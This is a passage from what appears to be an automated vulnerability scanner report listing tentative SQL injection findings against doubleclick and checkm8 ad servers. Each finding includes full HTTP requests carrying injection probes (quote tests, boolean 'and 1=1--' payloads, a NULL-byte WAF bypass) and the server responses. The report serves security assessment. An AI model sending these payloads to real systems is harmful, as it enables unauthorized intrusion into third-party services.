Content-Length: 3910
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 00:56:46 GMT

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...

1.11. http://googleads.g.doubleclick.net/pagead/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The slotname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the slotname parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409%00'&w=300&lmt=1316256959&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238959258&bpp=13&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316238953178&frm=4&adk=672172102&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=688&ady=2313&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=309&xpc=KJhLYOB9rm&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:35 GMT
Server: cafe
Cache-Control: private
Content-Length: 4567
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
i = d.indexOf("&");var r = '';if (ei >= 0)r = d.substring(ei, d.length);a.href = c + t + r; } else {a.href += "&clkt=" + t;}}return true;}(function(){var f=function(){var a=-1;try{htet()}catch(b){if(b.stack){var c=b.stack,a=c.split(" at").length-1;a==0&&(a=c.split(")@").length-1);a=a>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409%00''&w=300&lmt=1316256959&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238959258&bpp=13&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316238953178&frm=4&adk=672172102&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=688&ady=2313&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=309&xpc=KJhLYOB9rm&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 4052
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 01:00:37 GMT

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...

1.12. http://googleads.g.doubleclick.net/pagead/ads [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00'&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:20 GMT
Server: cafe
Cache-Control: private
Content-Length: 5987
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerifyTag - DFA -->
<!-- Copyright 2009 D
...[SNIP]...
ash"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00''&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:21 GMT
Server: cafe
Cache-Control: private
Content-Length: 3806
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...

1.13. http://q1.checkm8.com/adam/detect [C cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t'%20and%201%3d1--%20; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: A=dvV7X9wQ0M8MvENT06Sba;Path=/;
Set-cookie: C=oBK8X9we5HXUcgaJa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:15 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143300170/1217096312/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t'%20and%201%3d2--%20; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: C=oBK8X9we5HXUcgaJa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:15 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143300170/1217096312/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.14. http://q1.checkm8.com/adam/detect [WIDTH_RANGE parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The WIDTH_RANGE parameter appears to be vulnerable to SQL injection attacks. The payloads 20440401'%20or%201%3d1--%20 and 20440401'%20or%201%3d2--%20 were each submitted in the WIDTH_RANGE parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=Boston_Herald.Track.Front&page=6802504919469357&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D20440401'%20or%201%3d1--%20&DATE=01110917&HOUR=01&RES=RS21&ORD=6767618621233851&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9wOL36ZvENT06Sba; C=ouX7X9wuHKW7cgaJa4OQ95t

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:29:51 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: A=dvV7X9wDYV63vENT06Sba;Path=/;
Set-cookie: C=ofT8X9w5U7VGdga6b4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:03:11 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174630063/1248394023/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=Boston_Herald.Track.Front&page=6802504919469357&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D20440401'%20or%201%3d2--%20&DATE=01110917&HOUR=01&RES=RS21&ORD=6767618621233851&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9wOL36ZvENT06Sba; C=ouX7X9wuHKW7cgaJa4OQ95t

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:29:52 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: C=ogT8X9w5U7VGdga7b4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:03:12 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174630063/1248394023/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.15. http://q1.checkm8.com/adam/detect [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The cat parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cat parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=Boston_Herald.Track.Front'%20and%201%3d1--%20&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:06 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: A=dJJ8X9w40K63vtRS57Oca;Path=/;
Set-cookie: C=oNJ8X9wxYWVGdgaYa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:53:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174609135/1248373032/1137740046/4118631499
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=Boston_Herald.Track.Front'%20and%201%3d2--%20&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:06 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: C=oNJ8X9wxYWVGdgaZa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:53:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174609135/1248373032/1137740046/4118631499
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.16. http://q1.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&&&1%20and%201%3d1--%20=1 HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:21:05 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.16 NY-AD6
Set-cookie: A=dvV7X9wRIMMRvENT06Sba;Path=/;
Set-cookie: C=oLK8X9wHI86Ycga5a4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 151275073/1225019603/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&&&1%20and%201%3d2--%20=1 HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:21:05 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.16 NY-AD6
Set-cookie: C=oLK8X9wHI86Ycga6a4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
